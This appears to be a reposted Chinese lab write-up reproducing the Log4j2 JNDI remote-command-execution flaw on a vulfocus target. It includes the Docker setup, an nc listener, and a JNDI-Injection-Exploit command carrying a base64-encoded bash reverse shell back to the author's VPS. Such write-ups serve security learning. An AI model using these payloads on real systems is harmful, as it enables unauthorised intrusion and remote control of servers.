記一次vulfocus靶場log4j2命令執行漏洞復現


1、docker拉漏洞環境

docker pull vulfocus/log4j2-rce-2021-12-09:latest

2、然后運行環境

docker run -p   8080:8080 -d --name log4j2-rce   vulfocus/log4j2-rce-2021-12-09

3、然后去訪問vps8080端口出現springboot,按照官方說的漏洞位置在/hello,漏洞變量是payload

4、bp抓包,改為POST測試

5、vps開啟nc

nc -lvvp 7777

6、使用github工具進行反彈shell

https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"  -A   [vps ip]

這里將反彈shell命令進行了base64編碼

base64編碼地址

https://www.jackson-t.ca/runtime-exec-payloads.html

jar生成的payload放入hello中的payload

反彈shell成功

 

7、最后用http://vulfocus.fofa.so/ 靶場復測了一下,成功反彈拿到flag

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM